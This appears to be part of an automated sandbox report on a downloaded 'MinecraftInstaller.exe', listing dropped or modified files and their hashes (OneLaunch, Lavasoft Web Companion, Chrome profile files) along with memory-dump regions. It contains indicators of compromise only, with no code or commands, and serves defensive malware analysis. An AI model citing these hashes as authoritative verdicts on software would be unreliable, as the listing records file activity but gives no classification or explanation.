| MD5 | e31182ee8d1426afcb933ce8e6610141 |
| SHA1 | 1d0d78682210d5801a149d278e34298bdb518c95 |
| SHA256 | b535a93d6a3755b88735d4a58939b664588afa8af60bc416ca46ed6129e7973a |
| SHA512 | d58da6a030c7bbbfa7a09aeb76ca29594e59c819acbf9b40a898b21b2e204ef127c14921f33cacab63247a73cab853f2bbbcd31edf6acd41bb8a565f85786211 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0d984f3caa7d52cb232e31f263df1a2b |
| SHA1 | da1cae90944f043fef50a52c1f9798d2d2d354cf |
| SHA256 | 7b74749130e26a7dd67c4410c51ee2317552b97f5d33dde1a5523211ea196690 |
| SHA512 | a1122a6a51e5459c6f85b07feee544e674caa3f04eb6b9c252386e7aefc5398c48ebb9a4473d067801cd8dd9254f23eb9d23632dfa7250f71936bdeb39b973f1 |
C:\Users\Admin\Downloads\MinecraftInstaller.exe
| MD5 | d03193d3a30ceb126904df28abc953bc |
| SHA1 | 9ad806e2ebe4a6f6dd2d48cec1b598505d6e53ea |
| SHA256 | df166846ab3a86b2a797e81ee48377ee5dfb8a2f3091e6344816cfd63316e72b |
| SHA512 | a51d29b1eb3936fa3447aafe365dcee28f18fd6509cfe5d83e66b5ab7f1e0029ef8367c1203944ec93e1289570cc42b656d2c74b35e003b841f43efd336987eb |
memory/1348-8881-0x0000000075020000-0x00000000757D0000-memory.dmp
memory/1348-8883-0x0000000000080000-0x00000000020BE000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 57574d29da6c245cbd1757cc37fbe652 |
| SHA1 | d35aba3c966c46ce7880014ede3b042537147807 |
| SHA256 | d32d0593f91f0b6fc6893ab80cd53dc5ae5972d5f4f7f521bc3095f47ce7ddc0 |
| SHA512 | f81fd28834614622259a58d3e96e94316068c11db0a165d03c1021a747aeacbb57ab17c82a399033982ef13e9513cd8c433d604cad27c2e5d0cf754dba79e780 |
memory/1348-8893-0x0000000006A90000-0x0000000006AA0000-memory.dmp
memory/1348-8897-0x0000000007AB0000-0x0000000007AB8000-memory.dmp
memory/1348-8901-0x0000000006A90000-0x0000000006AA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 158ae20b7b5f681c5924f71467891f48 |
| SHA1 | b10aa3c3258e4abfe9b41bb7d34a5dfe5c1f0dee |
| SHA256 | 17fc7c8f51e88301a375a9d37dd02edfeb5311a7641f6b23903996971e6748d9 |
| SHA512 | b4e54fd48aa55975dd3cb145eb55c53c17fcc2eca303ebd556adb512bf5c565ab68224af839271e73754afa638dda6b1a137ecb18e108474d737182fb07d58aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a4a8965c6f7d68e8eb4f11feb9f252c2 |
| SHA1 | 2473a7c1cc45bdbb53e0f831119c307f21199131 |
| SHA256 | fe62c42afcb66ea400bf7957245d916e611324b504d5ea29b3758d4f0898b2ae |
| SHA512 | 15eb48036fc8978a04e3655670fe08d5a0bdc37de054aad8bc115f9d95425b89afe8c9f6e55ae8b62fec1b088806899e82f8dd033bfd40af1081121689ac48f9 |
memory/1348-8955-0x0000000007610000-0x0000000007618000-memory.dmp
memory/1348-8956-0x0000000075020000-0x00000000757D0000-memory.dmp
memory/1348-8957-0x0000000006A90000-0x0000000006AA0000-memory.dmp
memory/1348-8958-0x000000000A880000-0x000000000A8B8000-memory.dmp
memory/1348-8965-0x000000000A800000-0x000000000A80E000-memory.dmp
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
| MD5 | cdd6433b49575a3a11018af8a079b695 |
| SHA1 | b7c82e18b683939dff6891a9e3afe3f97275ed31 |
| SHA256 | bb4a53733f0033eb457acf98da3adcaed09328dbd37dd8991d788ae67187b33d |
| SHA512 | e9ec2ffdee94d0b66a7ccd0e01a187bdcc3fbd56d84835b4fb555797008e5891580da7ea1cbee1be38a6625850e23b433105cf6cc5b88d90b98a506a0da41a96 |
memory/4372-8987-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1348-8991-0x0000000006A90000-0x0000000006AA0000-memory.dmp
memory/1752-8992-0x00000000008E0000-0x00000000008E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\Win32Library.dll
| MD5 | 4f424691cf849999b6ac476ca09afdee |
| SHA1 | 98e2827aea19ccfc3980c5329f53e408f30acf8f |
| SHA256 | ca6793c4f4b12fac9506f441b8d6641a3e465dda0a1a14d49acdaa56a0389b07 |
| SHA512 | 2aec1c49b608a47b3804345094a108db3ce0e0ef7127eb70fa2e07a4c500fa697b33fcee4d7e6ebf3d8cc04dae13f7f07439d4dc1dcd6239baddef5d818edfff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1721f9e3fd87667325afff325fe5c39e |
| SHA1 | 88d630f8770740f6a210922c5e75417b361e9d2b |
| SHA256 | 90b9baddb59c47abfbee42c54d5e0350c83d7adc2bb1d37f4c9f85fc8329ec05 |
| SHA512 | 89fe1a276c90f62ae645b7f6b545c33ff776b873f8e29cfe605f06d7f13cf5713bf1fa013ff776627588aa51b97858524b80ec203dda604ebfa82139e2d9e9a4 |
memory/1752-9017-0x0000000003660000-0x0000000003670000-memory.dmp
memory/1752-9019-0x000000006BCB0000-0x000000006BCC4000-memory.dmp
memory/1752-9020-0x0000000008E90000-0x0000000008F22000-memory.dmp
memory/1752-9021-0x0000000075020000-0x00000000757D0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c345357238e64ed3cda974941e0ed4ce |
| SHA1 | 55246da46e926b13b382092a7dcb5c54f2616384 |
| SHA256 | cbfe039c7c3642b24487f8a5c6238b970cb720fa8171308544e85e7fe734c159 |
| SHA512 | faca09ab24f142230c3aec25b91524da83960d9d0f4b7a0f05913133b06a733197d03f07194fd72106e86359c8e0fcdfeab8b9967c2b35a6bb4acbc38597a82a |
memory/1348-9035-0x000000000CA70000-0x000000000CA7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\onelaunch.png
| MD5 | d3110fb775ee7fd24426503d67840c25 |
| SHA1 | 54f649c8bf3af2ad3a4d92cd8b1397bad1a49a75 |
| SHA256 | f8392390dc81756e79ec5f359dbdcac3b4bd219b5188a429b814fc51aabb6e36 |
| SHA512 | f6b79f728be17c9060edb2df2dac2b0f59a4dffd8c416e7e957bc3fa4696f4237e5969647309f5425a6297f189e351e20c99c642f90d1476050285929657c32f |
C:\Users\Admin\AppData\Local\Temp\is-8UTO4.tmp\pdf.png
| MD5 | 485cd5451b6a5e12380aa2e181abf046 |
| SHA1 | e1fe4637b2568aa8b26057ba6e653c0d37c8abc8 |
| SHA256 | 1d227c280d121311a0c7ec32acf8da0ffb34090da2c4c1e47cca701cd8b32c47 |
| SHA512 | 3dd90236103a52b112bfe4b90ba1bf985fec0d23f70f21ee7b2d677a0f29e929266fb1f2abb37e06a0029448f08e0feb5d4f8612115a7e81b05de0a5875a85f3 |
memory/1348-9057-0x0000000006A90000-0x0000000006AA0000-memory.dmp
memory/1752-9059-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/1348-9060-0x0000000075020000-0x00000000757D0000-memory.dmp
memory/1752-9063-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/4372-9064-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/1752-9066-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/1752-9079-0x0000000003660000-0x0000000003670000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c1db57655078b9a0141eb3e4a0e94719 |
| SHA1 | ae7671b6c27b19eb877365405bbc881a2f6721b4 |
| SHA256 | e6bbe6c1c06e9a802f29074127e1e8db68585975f56188ece56088999a33898f |
| SHA512 | a819c552a18d9d137c3f68bd72b5d3162b718b67ce8de5dbf59e1eb7d76d24e372e237b71e4b9c489ae58adf993394d7105d6301ab6ddbf000b22b53d33bf15e |
memory/1752-9087-0x0000000075020000-0x00000000757D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup.exe
| MD5 | 6d285b84c69ec7e7560079f5a0a8a30f |
| SHA1 | 53627a97ef072564829d41a1ab6519663d22ed66 |
| SHA256 | be62411d7b453f45940b9490ee0b80bfd93160cf45734f699b6218460bb9101f |
| SHA512 | 59873eecad9c9149dfe9b93357e415600d481969ca40bd8b37438072332c7c89dc5759ebef19b50d08101b50cd3758d66b8210bc67b9152341d5b3d3deb9967c |
memory/1752-9098-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/1752-9099-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/6064-9101-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/2004-9105-0x00000000026C0000-0x00000000026C1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4d751263998d7433682f5ed42df8d1f7 |
| SHA1 | 727855eabba9d0598f8caa8910b698a5314c748f |
| SHA256 | 86c987d2c5a09491c9b3a1236b3d0ece53d427b2794b52f42108e64ac2243e74 |
| SHA512 | 43f7912d3c885a73a691d89687e05934eb6c4056777a17c44ebcf101516cf031170e419d03ff95238041525d925f0e4bf5c3fe2bada7ef441832e80313cf21f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c385d6ceea1576042bf605d49d50ec0b |
| SHA1 | ba27315b49e1b3a5966b1cb4fc1d4400eb0126fa |
| SHA256 | d17a6b7e45b4cfb074b62609f66694da715b3ef36531c7374051184aea4a94bc |
| SHA512 | 356fc8a9fa8130365d5833d6977a57cad80dbedd71bed7700e4dc273b09fabbe13bfa38917b304a28a45bf9f04d4072ae67b3298b0bbe7664766f9c2809c0b15 |
memory/5744-9149-0x0000000000400000-0x00000000004E8000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
memory/1752-9178-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/3248-9187-0x00000000025D0000-0x00000000025D1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00009f
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
memory/6064-9215-0x0000000000400000-0x00000000004E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\split_tests.json
| MD5 | ea33b8c0de391aff43600a0ce7c4b87d |
| SHA1 | 8cc2700de8faac23b94e6e5dee37a91ce3ea0693 |
| SHA256 | a48eb3ac6fbff98a67b8c14b1fce8ad2a5a7d715a31e76decb97a843647fd61b |
| SHA512 | 6f005baeb6e82aedb5f6898f86266551ec938996afe5faf84b717947581816d7ccc25fbcc45b415b2b9af11b4bae2920a1c1b37134ccf74ebb8ac296ffd14aa2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000a7
| MD5 | aacb09a851eae685d43cfd40433878ba |
| SHA1 | 7d55809d5f30f0d80c8c4b6dde841705e83d3c86 |
| SHA256 | 00959d327e837ed71a879331b8d952c908779c30cf3296bdd9c939c62e756ef9 |
| SHA512 | ba526320bcfb8405aaa68c552879656d7474bc4fcd39c9a581e147db8a43d20ebb81da70d84dbfcedc979405458cc5f31e7f2515be3218dbcaf41112d2342ea5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000a8
| MD5 | c15d33a9508923be839d315a999ab9c7 |
| SHA1 | d17f6e786a1464e13d4ec8e842f4eb121b103842 |
| SHA256 | 65c99d3b9f1a1b905046e30d00a97f2d4d605e565c32917e7a89a35926e04b98 |
| SHA512 | 959490e7ae26d4821170482d302e8772dd641ffbbe08cfee47f3aa2d7b1126dccd6dec5f1448ca71a4a8602981966ef8790ae0077429857367a33718b5097d06 |
memory/3248-9250-0x0000000003680000-0x00000000037C0000-memory.dmp
memory/3248-9259-0x0000000071AA0000-0x0000000071AB4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\min-10-light.png
| MD5 | 2257b1d0d33a41f509e7c3e117819f8b |
| SHA1 | 87583bfbc655aec4e8cc4465b341c3f7889a6317 |
| SHA256 | d43e4b285b5b54313b53e87d2a56ca9ba0c85f8f55c9c5fdcdb4fac815ff4d02 |
| SHA512 | 702d1a126a0a7a64af5cee9450daeed74364aa9e9f123e1bc398ecd4215c082e7f55e43dd292a4119749e84999b015109bff8b11732df11143d202b385411cc5 |
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\min-rest.bmp
| MD5 | 2484489c7443ec4745488a77ed084d80 |
| SHA1 | fcf49d1be8bbbae3d0dea49bb5e677fb19d98d9d |
| SHA256 | 70b6921812f29b698f454927802db818c1625402baefd53ced1bfb9135c17d5a |
| SHA512 | a4776969b6bf215a85e7cfbc8f13dbb1beb4ef42eb5abfa572bb7f54c0032941c8bb178e7b77eda0c442741c29fccb02d8de157068dd31203bfed4e49ce051a5 |
memory/3248-9260-0x00000000044E0000-0x00000000044F0000-memory.dmp
memory/3248-9292-0x0000000075020000-0x00000000757D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\checkmark-10-light.png
| MD5 | a4d4dc66a41d9c3b54a2ed3ee8d4b3df |
| SHA1 | e91a5e7a6690c14c6f799e2433beb2f6388c4df6 |
| SHA256 | 46e9c171e2115cd43e5d05f6a5f6015b27bda065fbab939916fee2fd5c06d5a4 |
| SHA512 | 99d5425aa653b93d0b6065020f88c095c39d982fb20a0ed0078418e8e862a104b4f0392791c79d2df86410a0ba5ba60e644852943a9fc602f7eaf82fecaaefd4 |
memory/1752-9321-0x00000000036F0000-0x0000000003830000-memory.dmp
memory/1752-9323-0x0000000075020000-0x00000000757D0000-memory.dmp
memory/4372-9327-0x0000000000400000-0x00000000004E8000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8e74aa01f553ea2de533339c85274f5e |
| SHA1 | 822c7ed3a78ae8395c1be3f170d2bbed3184d29c |
| SHA256 | 3d66efb52a8315051ced1bb5666380c39f3d030eefaac7695f0114f2d82d40ac |
| SHA512 | ff921dee05f66e798b124972213ea42db959597708f885a8a6814c1ef405a63ea23d565833a46862a5cbf17574c33cb39508b7a9784a57c3dd56e6bfd37f85b2 |
memory/5744-9355-0x0000000000400000-0x00000000004E8000-memory.dmp
C:\ProgramData\Malwarebytes\MBAMService\version.dat
| MD5 | b79fc6865157061e51fb0645ad9a903c |
| SHA1 | 1aa0f9780958296e43ca99683f6a817fa8b64d5a |
| SHA256 | 36036814af474010c688d78cfb4744a5a328e2e392d647849b46134c40487e60 |
| SHA512 | ee5421674d22a7864a8ed5b6d543431f1cefd8e3af919422419fcbbbb0a7a36d231f056525ead0747bf0ee24467b073c553dedd905d1a75a0a729b679625a2cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | b48c6ee505759ba2eadfeaaca0d8b104 |
| SHA1 | 30b47986caa2d0d2dfcee0bf64d2cf2d087f1f6b |
| SHA256 | 47173e7a830017895b3f876da92497325cdd3e93755df34fc6028ac64d03946b |
| SHA512 | 8ce51eab0cc000d8d4013ef887934c9dc3974e0e1126559106667ae0c32c43d964c9ae585339f14c28f51ebc6bfbda207941dc8aaf46cdf03797b7e343fa0633 |
memory/3248-9377-0x00000000025D0000-0x00000000025D1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
memory/3248-9394-0x0000000003680000-0x00000000037C0000-memory.dmp
memory/3248-9397-0x0000000003680000-0x00000000037C0000-memory.dmp
memory/3248-9415-0x00000000044E0000-0x00000000044F0000-memory.dmp
C:\Users\Admin\AppData\Local\OneLaunch\profile.ico
| MD5 | d3c9b4d1d3878103ff515bf5233395c0 |
| SHA1 | 2f4c871057b9ef3f364074579afa6c5ef5c006c1 |
| SHA256 | 85cf400ce5de14535f8bef5097230aa5f10beaec06061848441ec294916a1022 |
| SHA512 | 0041b024d0b15d0840777e4a187df8f35f3667e60159f41fe76863f47b19cd2e8f38ebd4e9627a17e93f8bbe7407b47c3dda49eff7824a86345faf781df67f09 |
memory/3248-9432-0x0000000075020000-0x00000000757D0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0958609a7c23b7e3dd1d79c08c6c0635 |
| SHA1 | d96a3a2b7a37dd3ce18effad0caa8a738cedf1d6 |
| SHA256 | a82becd8dfedfd9f380654fb96994c2a7c03ad273c3c6cf8c9563f3838c39a62 |
| SHA512 | 4fbbc7b240230297675a00122b6e468da45773b939a51d3e8257f3049d8be60272d14408522df1e02b48fecf9b555f5c9064fb31b946fe53bdaa2de3b374a48a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 77a9b6e1b85c3ab3a4adf73e909def83 |
| SHA1 | fe58399e36b911b49f6a86ab59db7d7fc51b88c4 |
| SHA256 | c9eb6b2bcf58deb2d4bc1236205557e8abaecf3a2661111089dc79d8fe6416bf |
| SHA512 | ee8b30aa6300e6ec06f8e0f331d5ee9221fbf97629541f59e311d684469c52693984e4cb9ef6f805962e35a31c2ce8979d929c091c1ea5207996fb4aa6f08560 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5f0fa9.TMP
| MD5 | f382fea2b8f8c70ad64bdb0cb4fb165e |
| SHA1 | 1397915ad55c6810f8864a3eef399657557affdd |
| SHA256 | 223097208c8f495e6c39f889fdbfe3f2907cbc02988608f1fea1e9fde860068f |
| SHA512 | e47ac70991629705a793629423ecea8eecb74515c362820517511ad712fd55f2031866d7cd8662a1ba1bb48414328aa4a35d2e5ca0058fddac80ab00fb8abcd7 |
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\button-10-light.png
| MD5 | a879852024bf6de33c3bb293704e6fe5 |
| SHA1 | 8487af86f572f80d18720157906c6b74de2a52a8 |
| SHA256 | a45a7bf12d8e17d5b05c81cc3bd5ee5e9299b9b522e4b883ed00808635d99bba |
| SHA512 | 34666447f27f4355f991b66e4781738400619a4553415060c2c0dde59198b797999be4f24734ee04fa3c1c6dd3b4eb26ba48c361cd891855b30eed7586d521a7 |
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\exit-10-light.png
| MD5 | 2cce6763f61dddb4599cb058d6761c56 |
| SHA1 | 40bb1a5e735e52791c7c3f0a22ca4a63ec9a3737 |
| SHA256 | 0fc8e40a3b0e7a516e108dc0f3267dcccb4de04d28a21eb68a45a8ac1bb9df8f |
| SHA512 | bda0d42e1a844b2a9608816b07160ee42e1f4c8705d820cadf5cd5e714b7c9fb0c6e066db04b74d573a1f8f435324d807634648c348d5e456a61cc9dab684fa2 |
C:\Users\Admin\AppData\Local\Temp\is-2QT22.tmp\button-rest.bmp
| MD5 | 35b504ca889960b5ef306894dc9315fe |
| SHA1 | 38e0fda1828de12f9c88f4be2711cdc413a7ff8b |
| SHA256 | 85386bd819c2a097abf8225e96980235d536a825629c9481aafeda3c09055d91 |
| SHA512 | 3055d9eb57ba71270ce420c5691c11900cc00de5e79689fab772c7cd26dc10760615e6faec746c06d0f79fa8c0876d38e946555054d994ef28ac8c7a1c348a82 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f50636fefa5c552206679bd48fbbcbe2 |
| SHA1 | 3c6ec69733074cf2e86600434bddd2f9a8d42a95 |
| SHA256 | 9d5eea7de6e9798976a43001d8de260ca06d40416400ca5df65b16fd9089b8c6 |
| SHA512 | d65d86ac7cb529960303ed7e7fea253dadeb7281d168eacf41b2d89c6fceac72112c858d32a8a550c4abee5c19c272793bbcd0d29dee3a41192dd042d7ff79cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000bc
| MD5 | b0850920758de66c8178b1869fbebc0f |
| SHA1 | c5af0277c763338aaefefe3ab717592e47f2eabe |
| SHA256 | d652b931128d6d09e27f7dd89e821cdcd63c01284e40f8eec918e01bec9789dc |
| SHA512 | d941a215673a9530ea9099aff645187525aeaf2100394ecef3555919ff757197111fbb5e7813ba18da742bc4d1d29337c8f656ceb141851b1c0588a56f2ea240 |
memory/3248-9847-0x0000000003680000-0x00000000037C0000-memory.dmp
memory/3248-9865-0x0000000003680000-0x00000000037C0000-memory.dmp
memory/5960-9896-0x0000000000B70000-0x0000000000BEC000-memory.dmp
memory/5960-9895-0x0000000075020000-0x00000000757D0000-memory.dmp
memory/5960-9899-0x00000000054F0000-0x0000000005500000-memory.dmp
memory/5960-9902-0x0000000005B20000-0x0000000006138000-memory.dmp
memory/5960-9907-0x0000000005440000-0x0000000005490000-memory.dmp
memory/5960-9909-0x0000000005490000-0x00000000054A2000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4922d7190890350a1c2802a5911fb41b |
| SHA1 | d640778d555b859aeec35807a19ebaa420c53fd2 |
| SHA256 | 927c0d0baed02aa6891eea635fb805bc727a9bdfa49ee68326794a5108dc1efb |
| SHA512 | f3e7448578d6da5b4ca5d7d7f217ae82566e55cd6afa5cea9acaab7e0232bab4be6b6a675a865f505fad34ac498e0073fbacec84066c14955040f5e33d858ab2 |
memory/5960-9920-0x00000000054B0000-0x00000000054EC000-memory.dmp
memory/5960-9925-0x0000000005740000-0x000000000584A000-memory.dmp
memory/5960-9928-0x0000000006600000-0x000000000666E000-memory.dmp
memory/5960-9929-0x0000000006A20000-0x0000000006A40000-memory.dmp
memory/5960-9932-0x0000000006F70000-0x0000000006FD6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 36b656867ce1a80705b249fe1fb66ccc |
| SHA1 | 5fa22ec8beba7714ae852a798f8ae735b03d0689 |
| SHA256 | 3c01212433a6406a581750a7d7bcc208e8fbcde38db235f014a740170e3a09c2 |
| SHA512 | 4c314d370e3de5327c021e50a4fa7aee3947739f076c5f7ac2284ca68469ea430f2b7998e3e56f1366a1984e4a5ec534ab50a9fd6d3cf36a486775c8291cb4a9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 513f7713ce63b8420845e1fdb5536790 |
| SHA1 | e53b291186723db5bb55897a700b51e235dbaa7c |
| SHA256 | 4db6a59e2878d5cf8d48eea34c16de6bcc7ca70d55c808783c3a0c9a54b209e8 |
| SHA512 | 92be554e1edcdd985c9c11f69791ef761fbead6fbd88c9ebf3bf1f6b9c9ca2e351a196d5a8e1aade8cdcef0b71b7804f9189b9457c42219a64b92d5950121774 |
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\OneLaunch.exe
| MD5 | 4d7146be47468012321a6f3cf513309a |
| SHA1 | 48b29456faffe1570b9916107ee88a1106fd38f1 |
| SHA256 | cb7af54ba18ffeb3e253adae1ee14d240bba0b8dadf1ef4d42367fc1297c1818 |
| SHA512 | 3bab2f8778d44e2c2affa903c73e9b5f6cd89bfca5274d742b0f5b50278f4b17afd841b9f8f024ebe52ee3d16b38c8b5561802c95e481c2923d081f7bdb6e423 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | c25f25f54ac7a8c284074c66d84abc2f |
| SHA1 | a7a86d8c89ff15e5fb4d757944607d4519078b25 |
| SHA256 | 5b920372d7229f213bc988d822548ed6f352106722b5b76d78a21dfee8df818a |
| SHA512 | 6a7182cb1a5204e59d6bc95a62f5413d8e1202c6960fe430624f4445d2fe3f1c0fb18d2efb2b5b9ed38ef4185663c2862896fe4bc6fded258420444b0aa22191 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7325be28abf888689e2cac26a22039ce |
| SHA1 | 17310738cb83081906217163b37f043d86a89203 |
| SHA256 | 37e4deaa084e48043eb76427edae0583037197f7342b9178320f6d951d06abb3 |
| SHA512 | 6809ffbf7c51fb479da9b57e6576db8c2de81e9de0a6bc77b5dfe68fd50aa8037179149034d694a269d0ee083c6a58afe09c6d24e56d44dfce0057c74ec6d76f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e5f718b3f1d441f98fd271b21d12eedd |
| SHA1 | bbb142bd3b83e5bbd28e8cb7fd992cd7161b5c9b |
| SHA256 | 8c232cbaef503df50e58efba1eac3b531e1ab355cc7cc22b58f196d41221bdff |
| SHA512 | e45940eb6e694d1e606ba3ca39d079ccbc791f748fd36dc934ae7d7d6afd27a03648b1ef0fea13ed060b3e4773fb66b5b762a014962ca133aa56d6cfef665286 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\user.config
| MD5 | 2fbac5e46b244dc4925dc5a5f5288d4d |
| SHA1 | 8191c0b6c4475b6c06d19d7b6026441998ba2eae |
| SHA256 | 4c344ef8753ba2776bbdabaa49f6d829c6068b3dac41e8fc84dd287f5d2bcb18 |
| SHA512 | 23e8587a5cdebc0c6af787f9f47f6621a18a835382b5fd44bc8b33221e26b3333ff0d7530155ff18c30fc18eb102ac664701a679b11f7881f865331439bc40f4 |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\user.config
| MD5 | 20add8bb937a876eb8f8a4cce5a993bd |
| SHA1 | 98be9bdefd96c9ffc68ac0986ea35bf9f704c423 |
| SHA256 | c11dca4f920fec762cc24a30f9330a44c656f76235e7e0dbe5d936edc17da778 |
| SHA512 | eb7adc70e5429b7c8af08e515e0c06572d85d7095ee418263cf3de66286957b5477d01ad137208c25387d8195709c82117a62168a56a33734a7e4147b1bec760 |
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
| MD5 | d8c1b2bbcb21d02cc93f627bedd9edce |
| SHA1 | fa9a40ed69e6f000aee23d29738f242c23620a70 |
| SHA256 | a0700a0e96f3ca08a8f1ce872feba0e9a4e3da28cc92f67982fb8a1f659937b1 |
| SHA512 | ae482074e66a50c3f3d5b573f25058586815fec32286f33fdd0c5d5f3a543d20d0bd08a2a7f07aab15ffd9bc0a3f2b4ce8e53bc0bb06bb9856028cb505a73546 |
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ActiveFeatures.zip
| MD5 | 89619b1e4b55e0e0c4657605f7071b5c |
| SHA1 | d936842725ecbe1e1b27e8ec6c5452bff7d097e4 |
| SHA256 | 43f504f0beaf6251f60bc01f0ee42ba305e4759a43e99b021885dc7def693a8f |
| SHA512 | e6787bb99f158bf9ca0fd5bf7737211a4d06ba89bd1ea9feccd6f5baedabf8929a87e501a93e3ac42ec20158e6b2f2bec3c5ce99e89033108ebb894e6f31899a |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\45ronkyc.newcfg
| MD5 | cc8b42ce0f8a28b910ca70577ec1cc17 |
| SHA1 | 970140045f8483585cbeaeb51ae3b4d5d1c8f6f5 |
| SHA256 | 6afd282ab3f2d82eb9f00fa17de4167ba860087d400d434e1eb323c48f8d008a |
| SHA512 | f2982afb7e62b4a61d58f7af39beaa4194dadbc421d4865a8d98533278109a0721d3e7ba52b30956ed071c362a8aeb4afd66dd8f68421f11c3f56e6a8e9392ec |
C:\Users\Admin\AppData\Local\Lavasoft\WebCompanion.exe_Url_kleyaxrtenldtfqjmu2cbjmsn1otpqzk\11.4.0.689\dvxl21bh.newcfg
| MD5 | c4a4086b9828f340ab5d64ac719fc5bb |
| SHA1 | f2304c54a94e089b1e2220344433f99857360691 |
| SHA256 | 9d241141afe9852527561c7a08396d3b9127a78166ba627ed3486bed5402b585 |
| SHA512 | 28de17e652b2f3b403affaf81a305269f295111785c84f40d869522e6fc5c04be3b13f9ecda4dcc16fcab07df9660702cff33ed63a1d4a782bf5dff627bd37ec |
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Options\ServicePartnerInfo.txt
